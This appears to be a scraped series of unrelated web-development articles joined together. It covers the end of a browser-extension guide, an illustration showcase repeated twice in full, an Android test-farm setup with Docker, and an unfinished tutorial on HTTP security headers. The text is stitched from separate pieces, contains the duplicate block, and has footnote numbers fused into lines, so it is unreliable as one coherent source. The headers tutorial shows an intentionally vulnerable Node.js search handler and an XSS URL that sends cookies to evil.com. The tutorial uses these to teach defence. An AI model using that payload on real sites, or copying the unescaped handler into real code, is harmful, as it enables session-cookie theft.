For the client script part, it’s the same as in Edge, Chrome, Opera and Brave. Simply open the developer tools in the tab you’d like to debug, and you’ll find a moz-extension://guid section with your code to debug:
92If you need to debug a tab that your extension would create (like Vorlon.js’ Page Analyzer extension), simply use the developer tools:
94Finally, debugging a popup is a bit more complex but is well explained in the “Debugging Popups96” section of the documentation.
97Each vendor has detailed documentation on the process to follow to publish your extension in its store. They all take similar approaches. You need to package the extension in a particular file format — most of the time, a ZIP-like container. Then, you have to submit it in a dedicated portal, choose a pricing model and wait for the review process to complete. If accepted, your extension will be downloadable in the browser itself by any user who visits the extensions store.
Here are the various processes:
Please note that submitting a Microsoft Edge extension to the Windows Store is currently a restricted capability. Reach out to the Microsoft Edge team103 with your request to be a part of the Windows Store, and they’ll consider you for a future update.
I’ve tried to share as much of what I’ve learned from working on our Vorlon.js Page Analyzer extension104 and this little proof of concept.
Some developers remember the pain of working through various implementations to build their extension — whether it meant using different build directories, or working with slightly different extension APIs, or following totally different approaches, such as Firefox’s XUL extensions or Internet Explorer’s BHOs and ActiveX.
It’s awesome to see that, today, using our regular JavaScript, CSS and HTML skills, we can build great extensions using the very same code base and across all browsers!
Feel free to ping me on Twitter105 for any feedback.
(ms, vf, rb, yk, al, il)
On days when things don’t seem to go as you’d like them to and inspiration is at its lowest, it’s good to take a short break and go outside to try and empty your mind. That always seems to be the best remedy for me, especially whenever I jump on my bike and go for a short ride.
Now the time has come to enjoy these moments even more as the spring season finally starts to show up in nature. We’re starting to see green leaves on the trees again, and every morning I wake up to the sounds of the birds chirping. I really enjoy these small joys of spring — who doesn’t? Hopefully this new batch of illustrations will feed your creativity tank with extra vitamins to make sure those inspiration levels are up and running at its best.
Great color combination. Impressive how all elements have been refined to their best simplicity.
The fantasy of French illustrator Quentin Monge. Such a lovely style!
7Admiring how the illustrator played with light sources and shadows. The faces immediately catch your attention, don’t they?
9This one made me laugh. What if I was small? Those characters are just sublime! So very well done.
11Riding your bike together is exactly like you see here.
13Part of a bigger illustration of a mural. You can view a process video of how this was applied on the wall here15.
16Part of a bumper animation that plays before each film at Cinerama. Here you see it animated18. It’s really cool — I’m sure you’ll agree.
19Sometimes you don’t need much to get a great picture.
21This vintage bicycle event has always a nice poster.
23Nice style! The eyes with glasses are such stunners.
25A sneak peek of a new print the crew at DKNG is working on. Looks like Austin to me. Love the effect of the letters used as masks. How the few colors are applied is just sublime!
27One entry of ten finalists that capture the theme of “through young eyes” in this young photographers’ competition that aims to engage youth around the world in wildlife conservation. Check out the other nine submissions29, too.
30Divine color palette! Superb highlights and shadows.
32My kind of color palette and great textures.
34The colors are so harmonious and pleasing, and the drawing is just magnificent.
36Another addition to the European Tour Tycho is currently working on. This is quite lovely and makes me think back to the cassette era.
38Always a fan of something with a bike in it. When it’s created by the talented Madsberg it gets even better. I love the elegance in his work.
40Part of a series that was created as an irreverent ad campaign inspired by the hotel’s close relationship with the contemporary art world.
42Project on the theme of music, while playing with a Bauhaus-inspired style.
44Interesting play with lines. Not an easy one to pull off.
46With the atmosphere in this illustration you just feel the night. Come in and enjoy the ride.
48Brilliant light. Excellently executed. A perfect example of what you can get when you are in the right spot at the right time.
50Marvellous winter picture! Ain’t that light spectacular?
52Special style. Inspiring patterns.
54Lovely custom type and ornaments.
56Beautiful perspective, great reflection and amazing warm colors!
58Gorgeous photos of Paris from Nathalie Geffroy. Be sure to go see the rest.
60I’ve been following Oksana Grivina for many years and her style is just as lovely as I remember.
62The legendary car that still is to be seen in Oudenaarde, Belgium. Neil Stevens created this one for Matchbox.
64The portraits of Elodie are always a pleasure to look at. So many details to take in and think (wish I could do that).
66A second one from Elodie that I couldn’t resist. Look at those eyes and lips.
68Admiring the faces of these holiday characters for Westjet‘s inflight magazine “UP”. The expressions created with just a few lines.
70Love the use of color and patterns. Beautiful curvy lines of the landscape too!
72What an amazing display of white Northern Lights or white aurora curtain. Seen somewhere over Finland.
74Beautiful cover for Fabric‘s spring issue. Sam’s work usually has a futuristic element to it, but this one is great too, especially the plants and colors. Those lines and details in each leaf are just fantastically well executed. Perfect light and shadow effects too.
76The typefaces, textures and colors. They are all spot on in this illustration. Inspired by country vintage.
78Beautiful harmony and consistency without leaning over towards kitsch. Not easy when there is gold involved.
80Nice identity for The Digital Arts Expo, an annual showcase of student and faculty projects integrating engineering, computer science, and the visual and performing arts.
82Great nostalgic vibe in this one. Reminds of the early adverts from the 60’s. Love the bright colors, as well as the shadow and highlights effects.
84Illustration created for The Pixar Times86. Everybody loves a hero. Love how the shadows are done, and the pattern effects.
87Illustrations for Eurostar‘s Metropolitan magazine to accompany an article about what to see and do in Brussels. The butcher chasing the cow is such a nice detail.
89The faces are very original and recognizable as the style of Dutch illustrator Jackie Besteman.
91Love the figures and how they are portrayed.
93“When I’m stressed about work, I just think about this. Drawring!” Beautiful custom typography and great colors.
95A nice pattern of hotdogs to get you hungry. It’s available at the pattern library97.
98This image goes along an article on how Tim Tebow is making a drastic switch from being a football player to a baseball player. Love this vertical stripe collage blend effect. So well done!
100The lanes in the grass are like guides to draw you into the building. It also creates a beautiful symmetrical vibe.
102With a view like this I would totally think so. Taken in Belvedere, Tuscany.
104Great usage of minimal colors and shapes.
106Lovely tribute to the bokeh effect.
108(il)
On days when things don’t seem to go as you’d like them to and inspiration is at its lowest, it’s good to take a short break and go outside to try and empty your mind. That always seems to be the best remedy for me, especially whenever I jump on my bike and go for a short ride.
Now the time has come to enjoy these moments even more as the spring season finally starts to show up in nature. We’re starting to see green leaves on the trees again, and every morning I wake up to the sounds of the birds chirping. I really enjoy these small joys of spring — who doesn’t? Hopefully this new batch of illustrations will feed your creativity tank with extra vitamins to make sure those inspiration levels are up and running at its best.
Great color combination. Impressive how all elements have been refined to their best simplicity.
The fantasy of French illustrator Quentin Monge. Such a lovely style!
7Admiring how the illustrator played with light sources and shadows. The faces immediately catch your attention, don’t they?
9This one made me laugh. What if I was small? Those characters are just sublime! So very well done.
11Riding your bike together is exactly like you see here.
13Part of a bigger illustration of a mural. You can view a process video of how this was applied on the wall here15.
16Part of a bumper animation that plays before each film at Cinerama. Here you see it animated18. It’s really cool — I’m sure you’ll agree.
19Sometimes you don’t need much to get a great picture.
21This vintage bicycle event has always a nice poster.
23Nice style! The eyes with glasses are such stunners.
25A sneak peek of a new print the crew at DKNG is working on. Looks like Austin to me. Love the effect of the letters used as masks. How the few colors are applied is just sublime!
27One entry of ten finalists that capture the theme of “through young eyes” in this young photographers’ competition that aims to engage youth around the world in wildlife conservation. Check out the other nine submissions29, too.
30Divine color palette! Superb highlights and shadows.
32My kind of color palette and great textures.
34The colors are so harmonious and pleasing, and the drawing is just magnificent.
36Another addition to the European Tour Tycho is currently working on. This is quite lovely and makes me think back to the cassette era.
38Always a fan of something with a bike in it. When it’s created by the talented Madsberg it gets even better. I love the elegance in his work.
40Part of a series that was created as an irreverent ad campaign inspired by the hotel’s close relationship with the contemporary art world.
42Project on the theme of music, while playing with a Bauhaus-inspired style.
44Interesting play with lines. Not an easy one to pull off.
46With the atmosphere in this illustration you just feel the night. Come in and enjoy the ride.
48Brilliant light. Excellently executed. A perfect example of what you can get when you are in the right spot at the right time.
50Marvellous winter picture! Ain’t that light spectacular?
52Special style. Inspiring patterns.
54Lovely custom type and ornaments.
56Beautiful perspective, great reflection and amazing warm colors!
58Gorgeous photos of Paris from Nathalie Geffroy. Be sure to go see the rest.
60I’ve been following Oksana Grivina for many years and her style is just as lovely as I remember.
62The legendary car that still is to be seen in Oudenaarde, Belgium. Neil Stevens created this one for Matchbox.
64The portraits of Elodie are always a pleasure to look at. So many details to take in and think (wish I could do that).
66A second one from Elodie that I couldn’t resist. Look at those eyes and lips.
68Admiring the faces of these holiday characters for Westjet‘s inflight magazine “UP”. The expressions created with just a few lines.
70Love the use of color and patterns. Beautiful curvy lines of the landscape too!
72What an amazing display of white Northern Lights or white aurora curtain. Seen somewhere over Finland.
74Beautiful cover for Fabric‘s spring issue. Sam’s work usually has a futuristic element to it, but this one is great too, especially the plants and colors. Those lines and details in each leaf are just fantastically well executed. Perfect light and shadow effects too.
76The typefaces, textures and colors. They are all spot on in this illustration. Inspired by country vintage.
78Beautiful harmony and consistency without leaning over towards kitsch. Not easy when there is gold involved.
80Nice identity for The Digital Arts Expo, an annual showcase of student and faculty projects integrating engineering, computer science, and the visual and performing arts.
82Great nostalgic vibe in this one. Reminds of the early adverts from the 60’s. Love the bright colors, as well as the shadow and highlights effects.
84Illustration created for The Pixar Times86. Everybody loves a hero. Love how the shadows are done, and the pattern effects.
87Illustrations for Eurostar‘s Metropolitan magazine to accompany an article about what to see and do in Brussels. The butcher chasing the cow is such a nice detail.
89The faces are very original and recognizable as the style of Dutch illustrator Jackie Besteman.
91Love the figures and how they are portrayed.
93“When I’m stressed about work, I just think about this. Drawring!” Beautiful custom typography and great colors.
95A nice pattern of hotdogs to get you hungry. It’s available at the pattern library97.
98This image goes along an article on how Tim Tebow is making a drastic switch from being a football player to a baseball player. Love this vertical stripe collage blend effect. So well done!
100The lanes in the grass are like guides to draw you into the building. It also creates a beautiful symmetrical vibe.
102With a view like this I would totally think so. Taken in Belvedere, Tuscany.
104Great usage of minimal colors and shapes.
106Lovely tribute to the bokeh effect.
108(il)
Regression testing is one of the most time-consuming tasks when developing a mobile Android app. Using myMail as a case study, I’d like to share my experience and advice on how to build a flexible and extensible automated testing system for Android smartphones — from scratch.
The team at myMail currently uses about 60 devices for regression testing. On average, we test roughly 20 builds daily. Approximately 600 UI tests and more than 3,500 unit tests are run on each build. The automated tests are available 24/7, and save our testers a ton of time helping us to create high-quality applications. Without them, it would have taken us 36 hours (including wait time) to test every unit, or roughly 13 hours without the wait. It takes about 1.5 hours to run an automated test, including setup and translation updates. This cuts out weeks of tester work every day.
In case you write automated tests and do not deal with infrastructure, we will go through the process from the very beginning, from purchasing the phone and reinstalling firmware to creating Docker containers with the automated test phone inside. Watch the video1 to see the result.
When Android was just beginning to gain popularity, test developers had to choose the lesser of two evils: buy an expensive set of phones or work with slow and buggy virtual devices. Today, things are much simpler because virtual machines such as Android x86 and HAXM are available.
Yet there is still a choice to make. Many developers prefer virtual machines for automated tests, but actual phones have become a rather affordable option, even if your budget for test automation is limited. Real phones provide the most accurate picture of the application’s actual behavior. By using real phones, you can be certain that users will be able to perform any action in the program.
Accordingly, I recommend that even people who currently use virtual machines for test automation on Android obtain some real devices to ensure that their tests are also correct in real life. I’ll tell you how to choose a phone for automated regression testing and tell you what other equipment you’ll need in order to get everything to work together 24/7.
First of all, I should warn you that we will be choosing a phone model for regression tests, not configuration tests. Let’s assume that we have a lot of tests, for example 500 to 1000 application tests, that take 10 hours, and that we need several phones to complete them in 15 minutes. This sounds a little counterintuitive — why not just buy 10 to 20 different models of phones? The answer lies in the labor costs for the test automation code. You would end up writing the same test for different phone interfaces. When working with 20 different models, writing even one simple test would take a lot of time. But our present goal is to accelerate the execution of automated tests without increasing the labor costs of the programmer writing the tests.
The phone market is large, so it’s hard to know where to look first. What should be the criteria when choosing a phone? After some trial and error, I ended up with the following requirements (I’m not including any unit prices, since they should be readily available):
These criteria for purchasing a phone boil down to two things: Phone should not be slow and stuttering, and its software innards should be customizable as much as possible. Eliminating lag time saves us from the troubles of time-consuming tests, and customizability lets us correct problems that may arise over time (deterioration of operating system versions, internal phone bugs, a need to change system settings). If you find that something incorrectly works on the phone, then you at least have the chance to fix it yourself.
Root privileges, for example, let you use the command line to easily change the time on the phone, switch between Wi-Fi networks, and enable and disable system programs to simulate working with and without them. The unlocked boot sector lets users update the operating system and add custom firmware that extends the phone’s life even if the manufacturer discontinues support (which, unfortunately, is the case with most phones we have now). It would be sad if users running on Android 4.4 or Android 6 encountered an error, but your phones with automated tests run on Android 5, so nothing can be changed.
Unfortunately, you can’t ask the seller about most of these criteria at the time of purchase. That’s why we must first go to the XDA Developers forums158 and 4PDA forums9 to find all of the details we need to know about the model. If the model has been out for a while, pay attention to information about defects, memory and battery life — your device will be all but useless without these. Don’t be distracted by screens, buttons, cases, speakers and other features usually important to a user. The phone will work perfectly fine regardless (although this does depend on the specifics of your project).
Once you’ve chosen a model, you should probably order one or two for pretests to be sure that the OS doesn’t have any surprises in store, that all of the written tests run properly and that the hardware matches the manufacturer’s specifications. Below are the worst blunders I’ve seen in my experience as a buyer:
getprop and get-IDs. The issue is that the phone has passed through multiple hands and regions before getting to you. Its first owner was some Verizon subscriber from South Dakota. He returns it, and the now refurbished device somehow ends up with some seller in Tel Aviv, who unskillfully installs his local OS version on the hardware. Then, a seller from Moscow buys it and sells it again as a new phone. The courier brings it to you, and you receive your new eight-core reflashable Russian device, having no clue that you are actually holding a six-core locked area-specific device originally from a US cellular service customer.
10
12
13However, if you stick to the criteria above when choosing your phone, then these problems shouldn’t prove fatal. They can all be manually fixed to make the phone work properly.
So, which phones should you get to create your own test automation farm?
If you have the resources to buy the latest working models of Google Nexus (these are currently devices such as the Nexus 5X to 6P), then get these without thinking twice. You can install almost any operating system on them, they have an inherently “clean” Android base, and developers also tend to use them to test their applications.
Many companies are currently producing phone models for developers. With these phones, you can generally unlock the bootloader, and root privileges are available. If you find a good offer, take it.
Many phones with MediaTek (MTK) processors can be reflashed perfectly, and their main advantage is low cost. You’ll need to look for the specific models on the local market in your country, because the phones are typically available under different brand names, depending on location. The real manufacturers are usually large companies such as Gionee, Lenovo, Inventec, Tinno Mobile, Longcheer and Techain. These companies resell their phones in Western countries under brand names including Fly, Zopo, Wiko, Micromax, MyPhone, Blu, Walton, Allview and others. But not all phones are suitable: always evaluate them according to the criteria listed above. Farms with phones like these can often be cheaper than servers with virtual Android machines, so there is a significant chance to save some money here.
In addition to phones, you are going to need a computer and USB hubs to run the automated tests. There are some other things to consider at this stage. For example, constantly operating phones need a good power supply (at least 0.5A per device; more is better). The majority of hubs on the market come with weak adapters, not designed to have a constantly running phone plugged in at every port. Things are even more complicated when it comes to tablets: 9-inch tablets die quickly when running continuously becuase of large screen power consumption, so we have to choose among 7-inch units. In our experience, six to seven phones can be hooked up to a 4A adapter (depending on their workload). Therefore, most multiport hubs with a “3A adapter and 20 USB ports” are useless, to put it mildly. The cream of the crop is server solutions, but they are crazy expensive. So, we are going to have to limit ourselves to the consumer market. To keep the phone running, you have to get 3A four-port hubs or 4A six-port hubs. If a hub has a good power supply and a large number of ports, some ports can simply remain unused.
Let’s look at one phone model as an example. We will solve an OS problem and then try to put several devices together on a simple test stand for test automation. The phone itself is inexpensive and of decent quality, but it is not without its own shortcomings (described above). For example, these phones have the same iSerial, so ADB sees only one device, even if multiple devices are connected. We won’t change it everywhere on the phone, but we’ll make it possible for ADB to distinguish between the phones.
To do this, we have to reflash the phone’s bootloader and install a custom recovery partition on the phone. This is to protect ourselves from any unsuccessful experiments. The manuals on how to flash your specific phone model can be found in the XDA Developers forums158. Our phones have MT6580 installed, which is a MTK processor, so we can use SP Flash Tool as well as recovery.img and scatter file devices. These can be found online for almost any device on XDA Developers and 4PDA, but, if desired, a recovery can be compiled for your device using TWRP16 as a base and creating the scatter file yourself17. In any event, we’ll just take our files and reinstall them:
18Once the recovery partition is installed, use it to save the bootloader backup and move it to your machine. As a rule, this is where the OS configuration files are located.
In order to hardcode your iSerial, you’ll need to unpack the phone’s bootloader image. This can be done via Android Image Kitchen20. Start unpackimg.sh, and get the unpacked image in the ramdisk folder:
21init files here containing different variables, including the serial number.
22Let’s find the file with the serial number ${ro.serialno and replace it with our own number — for example, 999222333019:
find ramdisk/ -maxdepth 1 -name "init.mt*" -exec sed -i
's/${ro.serialno}/999222333019/g' {} +
Now, let’s pack the image back up using repacking.sh, transfer it to the phone and install it using custom recovery. Now ADB can distinguish between devices. All we need to do now is turn on developer mode on the phone and enable debugging in the developer menu. Any similar problems can be solved in exactly the same way. Pretty much everything on the phone can be reinstalled if that is what the tests require.
We will use a standard desktop with Ubuntu as the host for our test system. It might be necessary to transfer the connected phones from one computer to another. We might also need to build separate versions of the app for specific phone models.
To accomplish this, for each phone it’s a good idea to create an isolated virtual environment that we can change if necessary (for example, to install other versions of the Java Development Kit or to configure monitoring), without altering the other phones’ environments. As a result, our machine will be divided into several environments, each one accessible via a single phone (or a group of phones, depending on your requirements). We can establish these environments by creating several virtual machines on the host (this can be done on any operating system). Or you can do what I like to do, which is divide the phones using Docker containers, which work best on Linux. We will use a conventional desktop with Ubuntu as an example of a host for our stand.
There are specifics to consider when ordering or building the machines that the phones will be connected to. Apart from the standard HDD, RAM and CPU specs, pay attention to the number of USB controllers on the motherboard and the supported USB protocol. Phones that use USB 3.0 (xHCI) could significantly limit the maximum number of devices attached to the machine (usually 8 per controller, or 16 devices for a machine with 2 controllers), so it’s worth checking whether it’s possible to turn it off and use only EHCI. You will find those options in the BIOS or OS. It is best to forcibly disable xHCI in the BIOS if you don’t require high-speed devices.
As I wrote earlier, we want an integration system slave-agent to work with a specific phone and see only this phone. This way, the tests won’t accidentally run on other phones and give false pass or error results. To accomplish this, we need to separate them. When an integration system agent launches in a Docker container, each agent has access to only one device, so we can divide tasks in the integration system by specific phone models, operating system versions, screen sizes and other characteristics (for example, a container with a tablet can perform tests that require a wide screen, and a container with a phone could run tests requiring the ability to receive text messages).
Let’s use the example of a system installation and setup on Ubuntu. Here is the installation of Docker itself:
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D echo 'deb https://apt.Dockerproject.org/repo main' >> /etc/apt/sources.list.d/Docker.list sudo apt-get update sudo apt-get install Docker-engine
We are going to use OverlayFS as a storage driver (it is relatively fast and reliable). You can read about the differences between various storage drivers23 on the official Docker website.
echo 'DOCKER_OPTS="-s overlay"' >> /etc/default/Docker
Then, we will create a Dockerfile, which is an instruction for Docker to install the minimum required software for the virtual environment where a mobile device will be isolated. We will create images from this instruction. Let’s add the Android SDK to the Dockerfile:
FROM ubuntu:trusty #Update the list of repositories and add webupd8team repository, from which we'll install Java RUN apt-get update -y && apt-get install -y software-properties-common && add-apt-repository ppa:webupd8team/java -y && apt-get update -y && echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | /usr/bin/debconf-set-selections && apt-get install -y oracle-java8-installer && apt-get remove software-properties-common -y && apt-get autoremove -y && apt-get clean #Set the environment variables for Java and the desired version of Ant ENV JAVA_HOME /usr/lib/jvm/java-8-oracle ENV ANT_VERSION 1.9.4 # Install Ant version specified above RUN cd && wget -q http://archive.apache.org/dist/ant/binaries/apache-ant-${ANT_VERSION}-bin.tar.gz && tar -xzf apache-ant-${ANT_VERSION}-bin.tar.gz && mv apache-ant-${ANT_VERSION} /opt/ant && rm apache-ant-${ANT_VERSION}-bin.tar.gz # Set the environment variable for Ant ENV ANT_HOME /opt/ant ENV PATH ${PATH}:/opt/ant/bin #Install Android Build Tools and the required version of Android SDK #You can create several versions of the Dockerfile if you need to test #several versions ENV ANDROID_SDK_VERSION r24.4.1 ENV ANDROID_BUILD_TOOLS_VERSION 23.0.3 RUN dpkg --add-architecture i386 && apt-get update -y && apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 && rm -rf /var/lib/apt/lists/* && apt-get autoremove -y && apt-get clean ENV ANDROID_SDK_FILENAME android-sdk_${ANDROID_SDK_VERSION}-linux.tgz ENV ANDROID_SDK_URL http://dl.google.com/android/${ANDROID_SDK_FILENAME} ENV ANDROID_API_LEVELS android-15,android-16,android-17,android-18,android-19,android-20,android-21,android-22,android-23 ENV ANDROID_HOME /opt/android-sdk-linux ENV PATH ${PATH}:${ANDROID_HOME}/tools:${ANDROID_HOME}/platform-tools RUN cd /opt && wget -q ${ANDROID_SDK_URL} && tar -xzf ${ANDROID_SDK_FILENAME} && rm ${ANDROID_SDK_FILENAME} && echo y | android update sdk --no-ui -a --filter tools,platform-tools,${ANDROID_API_LEVELS},build-tools-${ANDROID_BUILD_TOOLS_VERSION} ###Now add the integration system file. It can be a Jenkins slave, a Bamboo agent, etc., depending on what you're working with. ADD moyagent.sh /agentCI/
You can also add all of the necessary libraries and files for the integration system agent to the Dockerfile. At some point, you might have to build containers not only for your physical devices, but also for virtual Android phone emulators. In this case, you can just add the required settings to the instructions. Now we’ll build the Dockerfile:
Docker build .
Now we have a runnable docker image; however, the container that we spawn from it would not see any devices (or, on the contrary, the container would see all USB devices if we run it in privileged mode). We need it to see only those devices we want it to see. So, we specify a symbolic link (or symlink) in our host, which we will transfer to the Docker container created from the image. The symlink uses udev:
echo ‘"SUBSYSTEM=="usb", ATTRS{serial}=="$DEVICE_SERIAL", SYMLINK+="androidDevice1"' >> /etc/udev/rules.d/90-usb-symlink-phones.rules
Instead of $DEVICE_SERIAL, we enter our freshly installed serial number and reload the device’s rule definitions:
udevadm control --reload udevadm trigger
Now when the phone is attached via USB, we will have a device symlink to the /dev/androidDevice1 path with the serial number $DEVICE_SERIAL. All we have left to do is transfer it to the container on startup:
Docker run -i -t --rm --device=/dev/androidDevice1:/dev/bus/usb/001/1 android-Docker-image:latest adb devices
This means that we want to create a container from the Android Docker image that must be able to access the device with the /dev/androidDevice1 symlink. We also want to launch the ADB devices command in the container itself, which will show us a list of available devices.
If the phone is visible, then we’re ready. If an integration system agent was installed in the image, we can use the following command to launch it:
Docker run -i -t --rm --device= /dev/androidDevice1:/dev/bus/usb/001/1 android-Docker-image:latest /bin/sh /agentCI/moyagent.sh
Now we have launched the container in which the system integration agent is running. The agent now has access to the device via the /dev/androidDevice1 symlink and to the virtual environment where all programs specified in Dockerfile (the Android SDK and additional dependencies) are installed.
By the way, it wasn’t until fairly recently that the command line option --device started working with symlinks (see the GitHub master branch24). Previously, we had to generate the realpath from symlinks using a script and transfer it to Docker. So, if you can’t manage to connect the device, add the following script to the udev parameter RUN+= (if the connected phone is located at /dev/bus/usb/010/1):
realpath /dev/androidDevice1 | xargs -I linkpath link linkpath /dev/bus/usb/010/1
This will let you use old versions of Docker to launch a container that can access the phone:
Docker run --privileged -v /dev/bus/usb/010/:/dev/bus/usb/100/ -i -t android-Docker-image:latest adb devices
That’s it. You can now connect your slave to the integration system and work with it.
If the phone is visible, then we’re done. If a system integration agent has been installed in the image, then we can run it with the following command:
docker run -i -t --rm --device= /dev/androidDevice1:/dev/bus/usb/001/1 android-docker-image:latest /bin/sh /agentCI/moyagent.sh
Now we’ve launched our container with the system integration agent launched in it. The device is available to the agent via the /dev/androidDevice1 symlink and also via the virtual environment where you installed the programs from our Dockerfile (the Android SDK and other dependencies). The launched agent must connect to your server (such as Bamboo or Jenkins), from which you can give it commands to perform the automated tests.
When your container is ready, all you need to do is connect it to your integration system. Each of such systems has extensive documentation and a lot of examples of usage:
As soon as you connect your container according to the instruction, you will be able to execute code, launch your tests and work with your container via your systems.
Sooner or later, physical mobile devices will appear in the integration system of every relatively large Android project. The need to fix mistakes, perform non-standard test cases and simply test for the presence of certain features all inevitably require an actual device. In addition, the devices won’t use your server resources, because they have their own processors and memory. Thus, the host for the phones doesn’t have to be super-powerful; any home desktop would handle this load nicely.
Consider the advantages and see what would be best for you — your automated testing system almost certainly has room for physical devices. I wish you all fewer bugs and more test coverage! Real devices have both advantages and disadvantages. It would be great if you could share your opinion and expertise and tell us which is better to use: real devices or virtual machines. Looking forward to your comments!
(rb, yk, al, il)
Web applications, be they thin websites or thick single-page apps, are notorious targets for cyber-attacks. In 2016, approximately 40% of data breaches1 originated from attacks on web apps — the leading attack pattern. Indeed, these days, understanding cyber-security is not a luxury but rather a necessity for web developers, especially for developers who build consumer-facing applications.
HTTP response headers can be leveraged to tighten up the security of web apps, typically just by adding a few lines of code. In this article, we’ll show how web developers can use HTTP headers to build secure apps. While the code examples are for Node.js, setting HTTP response headers is supported across all major server-side-rendering platforms and is typically simple to set up.
Technically, HTTP headers are simply fields, encoded in clear text, that are part of the HTTP request and response message header. They are designed to enable both the HTTP client and server to send and receive meta data about the connection to be established, the resource being requested, as well as the returned resource itself.
Plain-text HTTP response headers can be examined easily using cURL, with the --head option, like so:
$ curl --head https://www.google.com HTTP/1.1 200 OK Date: Thu, 05 Jan 2017 08:20:29 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Transfer-Encoding: chunked Accept-Ranges: none Vary: Accept-Encoding …
Today, hundreds of headers are used by web apps, some standardized by the Internet Engineering Task Force6 (IETF), the open organization that is behind many of the standards that power the web as we know it today, and some proprietary. HTTP headers provide a flexible and extensible mechanism that enables the rich and varying use cases found on the web today.
Caching is a valuable and effective technique for optimizing performance in client-server architectures, and HTTP, which leverages caching extensively, is no exception. However, in cases where the cached resource is confidential, caching can lead to vulnerabilities — and must be avoided. As an example, consider a web app that renders and caches a page with sensitive information and is being used on a shared PC. Anyone can view confidential information rendered by that web app simply by visiting the browser’s cache, or sometimes even as easily as clicking the browser’s “back” button!
The IETF’s RFC 72347, which defines HTTP caching, specifies the default behavior of HTTP clients, both browsers and intermediary Internet proxies, to always cache responses to HTTP GET requests — unless specified otherwise. While this enables HTTP to boost performance and reduce network congestion, it could also expose end users to theft of personal information, as mentioned above. The good news is that the HTTP specification also defines a pretty simple way to instruct clients not to cache a given response, through the use of — you guessed it! — HTTP response headers.
There are three headers to return when you are returning sensitive information and would like to disable caching by HTTP clients:
Cache-Controlcache-control: no-cache, no-store, must-revalidate. These three directives pretty much instruct clients and intermediary proxies not to use a previously cached response, not to store the response, and that even if the response is somehow cached, the cache must be revalidated on the origin server.Pragma: no-cacheCache-Control header mentioned above. Use Pragma: no-cache to ensure that these older clients do not cache your response.Expires: -1-1, instead of an actual future time, you ensure that clients immediately treat this response as stale and avoid caching.Note that, while disabling caching enhances the security of your web app and helps to protect confidential information, is does come at the price of a performance hit. Make sure to disable caching only for resources that actually require confidentiality and not just for any response rendered by your server! For a deeper dive into best practices for caching web resources, I highly recommend reading Jake Archibald’s post8 on the subject.
Here’s how you would program these headers in Node.js:
function requestHandler(req, res) { res.setHeader('Cache-Control','no-cache,no-store,max-age=0,must-revalidate'); res.setHeader('Pragma','no-cache'); res.setHeader('Expires','-1'); }
Today, the importance of HTTPS is widely recognized by the tech community. More and more web apps configure secured endpoints and are redirecting unsecure traffic to secured endpoints (i.e. HTTP to HTTPS redirects). Unfortunately, end users have yet to fully comprehend the importance of HTTPS, and this lack of comprehension exposes them to various man-in-the-middle (MitM) attacks. The typical user navigates to a web app without paying much attention to the protocol being used, be it secure (HTTPS) or unsecure (HTTP). Moreover, many users will just click past browser warnings when their browser presents a certificate error or warning!
The importance of interacting with web apps over a valid HTTPS connection cannot be overstated: An unsecure connection exposes the user to various attacks, which could lead to cookie theft or worse. As an example, it is not very difficult for an attacker to spoof network frames within a public Wi-Fi network and to extract the session cookies of users who are not using HTTPS. To make things even worse, even users interacting with a web app over a secured connection may be exposed to downgrade attacks, which try to force the connection to be downgraded to an unsecure connection, thus exposing the user to MitM attacks.
How can we help users avoid these attacks and better enforce the usage of HTTPS? Enter the HTTP Strict Transport Security (HSTS) header. Put simply, HSTS makes sure all communications with the origin host are using HTTPS. Specified in RFC 67979, HSTS enables a web app to instruct browsers to allow only HTTPS connections to the origin host, to internally redirect all unsecure traffic to secured connections, and to automatically upgrade all unsecure resource requests to be secure.
HSTS directives include the following:
max-age=<number of seconds>includeSubDomainspreloadA word of caution: using the preload directive also means it cannot be easily undone, and carries an update lead time of months! While preload certainly improves your app’s security, it also means you need to be fully confident your app can support HTTPS-only!
My recommendation is to use Strict-Transport-Security: max-age=31536000; includeSubDomains; which instructs the browser to enforce a valid HTTPS connection to the origin host and to all subdomains for a year. If you are confident that your app can handle HTTPS-only, I would also recommend adding the preload directive, in which case don’t forget to register your website on the preload list as well, as noted above!
Here’s what implementing HSTS looks like in Node.js:
function requestHandler(req, res) { res.setHeader('Strict-Transport-Security','max-age=31536000; includeSubDomains; preload'); }
In a reflected cross-site scripting attack (reflected XSS), an attacker injects malicious JavaScript code into an HTTP request, with the injected code “reflected” in the response and executed by the browser rendering the response, enabling the malicious code to operate within a trusted context, accessing potentially confidential information such as session cookies. Unfortunately, XSS is a pretty common web app attack, and a surprisingly effective one!
To understand a reflected XSS attack, consider the Node.js code below, rendering mywebapp.com, a mock and intentionally simple web app that renders search results alongside the search term requested by the user:
function handleRequest(req, res) { res.writeHead(200); // Get the search term const parsedUrl = require('url').parse(req.url); const searchTerm = decodeURI(parsedUrl.query); const resultSet = search(searchTerm); // Render the document res.end( "<html>" + "<body>" + "<p>You searched for: " + searchTerm + "</p>" + // Search results rendering goes here… "</body>" + "</html>"); };
Now, consider how will the web app above handle a URL constructed with malicious executable code embedded within the URL, such as this:
https://mywebapp.com/search?</p><script>window.location=“http://evil.com?cookie=”+document.cookie</script>
As you may realize, this URL will make the browser run the injected script and send the user’s cookies, potentially including confidential session cookies, to evil.com!
To help protect users against reflective XSS attacks, some browsers have implemented protection mechanisms. These mechanisms try to identify these attacks by looking for matching code patterns in the HTTP request and response. Internet Explorer was the first browser to introduce such a mechanism with its XSS filter, introduced in Internet Explorer 8 back in 2008, and WebKit later introduced XSS Auditor, available today in Chrome and Safari. (Firefox has no similar mechanism built in, but users can use add-ons to gain this functionality.) These various protection mechanisms are not perfect: They may fail to detect a real XSS attack (a false negative), and in other cases may block legitimate code (a false positive). Due to the latter, browsers allow users to disable the XSS filter via the settings. Unfortunately, this is typically a global setting, which turns off this security feature completely for all web apps loaded by the browser.
Luckily, there is a way for a web app to override this configuration and ensure that the XSS filter is turned on for the web app being loaded by the browser. This is done via the X-XSS-Protection header. This header, supported by Internet Explorer (from version 8), Edge, Chrome and Safari, instructs the browser to turn on or off the browser’s built-in protection mechanism and to override the browser’s local configuration.
X-XSS-Protection directives include these:
1 or 0mode=blockI recommend always turning on the XSS filter, as well as block mode, to maximize user protection. Such a response header looks like this:
X-XSS-Protection: 1; mode=block
